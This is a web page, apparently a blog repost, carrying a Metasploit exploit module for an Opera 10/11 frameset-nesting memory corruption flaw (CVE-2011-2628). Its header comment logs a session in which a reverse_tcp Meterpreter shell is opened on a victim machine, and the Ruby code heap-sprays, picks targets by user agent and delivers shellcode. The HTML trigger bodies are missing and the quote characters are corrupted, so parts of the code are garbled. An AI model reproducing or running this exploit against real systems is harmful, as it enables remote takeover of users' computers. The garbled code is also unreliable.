Opera 10/11 (bad nesting with frameset tag) Memory Corruption

发表评论 (0) 查看评论

###############################################################################################################
# Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption
#
# Vulnerability:
#
# Discovered: 2010-08-18
# Patched: 2011-05-18
# Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
# v11.xx < v11.11 (v11.00, v11.01 and v11.10) # Patched on: v11.11 # # Exploit: # # Coded: 2010-09-23 # Last revision: 2011-09-30 # # RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10* # DoS on: v10.01, v10.10, v10.53, v10.61 and v10.63 # # Notes: # # 1) DEP bypass: possible but unreliable. # 2) Let me know if you improve this one 😉 # 3) Most of times, it won't work at first attempt and need crash-dialog interaction. # # Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com # # Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, etc # # Running against Opera v10.62... # # # =[ metasploit v4.0.1-dev [core:4.0 api:1.0] # + -- --=[ 741 exploits - 378 auxiliary - 82 post # + -- --=[ 228 payloads - 27 encoders - 8 nops # =[ svn r13801 updated 3 days ago (2011.09.27) # # msf > use windows/browser/opera_frameset_tag
# msf exploit(opera_frameset_tag) > set payload windows/meterpreter/reverse_tcp
# payload => windows/meterpreter/reverse_tcp
# msf exploit(opera_frameset_tag) > set LHOST 192.168.1.103
# LHOST => 192.168.1.103
# msf exploit(opera_frameset_tag) > exploit
# [*] Exploit running as background job.
#
# [*] Started reverse handler on 192.168.1.103:4444
# msf exploit(opera_frameset_tag) >
# [*] Using URL: http://0.0.0.0:8080/sUpFmezLW6jS
# [*] Local IP: http://192.168.1.103:8080/sUpFmezLW6jS
# [*] Server started.
# [*] Sending Opera 10/11 (bad nesting with frameset tag) Memory Corruption to 192.168.1.104:1185 (target: Opera Browser (v10.6x – v11.xx) / Windows XP SP3 (DEP-default))
# [*] Sending stage 1 (Spraying the heap)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage (752128 bytes) to 192.168.1.104
# [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.104:1190) at 2011-09-30 19:23:28 +0200
# Interrupt: use the ‘exit’ command to quit
# msf exploit(opera_frameset_tag) > sessions
#
# Active sessions
# ===============
#
# Id Type Information Connection
# — —- ———– ———-
# 1 meterpreter x86/win32 0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12 192.168.1.103:4444 -> 192.168.1.104:1190
#
# msf exploit(opera_frameset_tag) > sessions -i 1
# [*] Starting interaction with 1…
#
# meterpreter > getuid
# Server username: 0XDE1-A39ED4C12\0xde1
# meterpreter > execute -f calc.exe
# Process 1336 created.
# meterpreter > exit
# [*] Shutting down Meterpreter…
# msf exploit(opera_frameset_tag) >
#
################################################################################################################

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => ‘Opera 10/11 (bad nesting with frameset tag) Memory Corruption’,
‘Description’ => %q{

This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within
Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses.
Successfully exploiting leads to remote code execution or denial of service condition under Windows XP
SP3 (DEP = off).

Note than most of cases, it won’t work at first attempt and need crash-dialog interaction.
Read the last reference for further details.

},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Jose A. Vazquez’
],
‘Version’ => ‘$Revision: 0011 $’,
‘References’ =>
[
[‘CVE’, ‘2011-2628’],
[‘OSVDB’, ‘72406’],
[‘BID’, ‘47906’],
[‘URL’, ‘http://www.opera.com/support/kb/view/992/’],
[‘URL’, ‘http://www.beyondsecurity.com/ssd.html’],
[‘URL’, ‘http://spa-s3c.blogspot.com/2011/05/spas3c-sv-004opera-browser-1111.html’],
[‘URL’, ‘http://spa-s3c.blogspot.com/2011/09/spas3c-sv-004reliability-tests-ssd.html’]
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
‘HTTP::compression’ => ‘gzip’,
‘HTTP::chunked’ => true
},
‘Payload’ =>
{
‘Space’ => 1000,
‘BadChars’ => “\x00”,
‘Compat’ =>
{
‘ConnectionType’ => ‘-find’,
},
‘StackAdjustment’ => -3500
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
# Automatic
[ ‘Automatic’,
{}
],

# Opera > v10.54 ~ spray of 350 MB
[ ‘Opera Browser (v10.6x – v11.xx) / Windows XP SP3 (DEP-default)’,
{
‘SizeofSpray’ => 700,
‘Ret’ => 0x0c0c0c0c
}
],

# Opera <= v10.54 ~ spray of 250 MB [ 'Opera Browser (v10.50 - v10.54) / Windows XP SP3 (DEP-default)', { 'SizeofSpray' => 500,
‘Ret’ => 0x0c0c0c0c
}
],

# Opera < v10.50 doesn't get crashed with previous method and it needs this one. [ 'Opera Browser (v10.00 - v10.10) / Windows XP SP3 (DEP-default)', { 'SizeofSpray' => 500,
‘Ret’ => 0x0c0c0c0c
}
]
],
‘DisclosureDate’ => ‘5 October 2011’,
‘DefaultTarget’ => 0))

end

#I don’t know if Msf::Exploit::Remote::BrowserAutopwn works, but I’m going to include my own auto-target selection

def automatic_target(cli, request)

thistarget = nil

agent = request.headers[‘User-Agent’]

if agent =~ /Version\/10\.00/ or agent =~ /Version\/10\.01/ or agent =~ /Version\/10\.10/
thistarget = targets[3]
elsif agent =~ /Version\/10\.50/ or agent =~ /Version\/10\.51/ or agent =~ /Version\/10\.52/ or agent =~ /Version\/10\.53/ or agent =~ /Version\/10\.54/
thistarget = targets[2]
else
thistarget = targets[1]
end

thistarget

end

def on_request_uri(cli, request)

mytarget = target

if target.name == ‘Automatic’
mytarget = automatic_target(cli, request)
end

if(request.uri =~ /\.xhtml$/)

#Send file for trigger the vulnerability for cases > v10.10

html = %Q|





rbc




|

#Send triggerer

print_status(“Sending stage 2 (Triggering the vulnerability)”)

var_contentype = ‘application/xhtml+xml’

else

#Send payload + hide iframe for trigger the vuln

#Re-generate the payload

return if ((p = regenerate_payload(cli)) == nil)

#Encode the shellcode

shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))

#Ret

addr_word = [mytarget.ret].pack(‘V’).unpack(‘H*’)[0][0,4]

#Randomize the javascript variable names

var_buffer = rand_text_alpha(rand(30)+2)
var_shellcode = rand_text_alpha(rand(30)+2)
var_unescape = rand_text_alpha(rand(30)+2)
var_x = rand_text_alpha(rand(30)+2)
var_i = rand_text_alpha(rand(30)+2)

var_size = rand_text_alpha(rand(30)+2)
var_nopsize = rand_text_alpha(rand(30)+2)
var_limit = rand_text_alpha(rand(30)+2)

var_function_trigger = rand_text_alpha(rand(30)+2)
var_file_trigger = rand_text_alpha(rand(30)+2)

var_timer_trigger = (rand(3) + 2) * 1000

#Build the exploit

var_url = ((datastore[‘SSL’]) ? “https://” : “http://”)
var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']) var_url << ":" + datastore['SRVPORT'] var_url << get_resource #Sending init HTML print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})") if mytarget.name =~ /v10.00/ # Case v10.00 - v10.10 html = %Q|



aaaaaa





|

print_status(“Sending simple stage (Sprayer and Triggerer)”)
var_contentype = ‘application/xhtml+xml’

else

# Case > v10.10

html = %Q|





|

print_status(“Sending stage 1 (Spraying the heap)”)
var_contentype = ‘text/html’

end

end

#Response
send_response(cli, html, { ‘Content-Type’ => var_contentype, ‘Pragma’ => ‘no-cache’ })
#Handle the payload
handler(cli)

end

end

发表评论?

0 条评论。

发表评论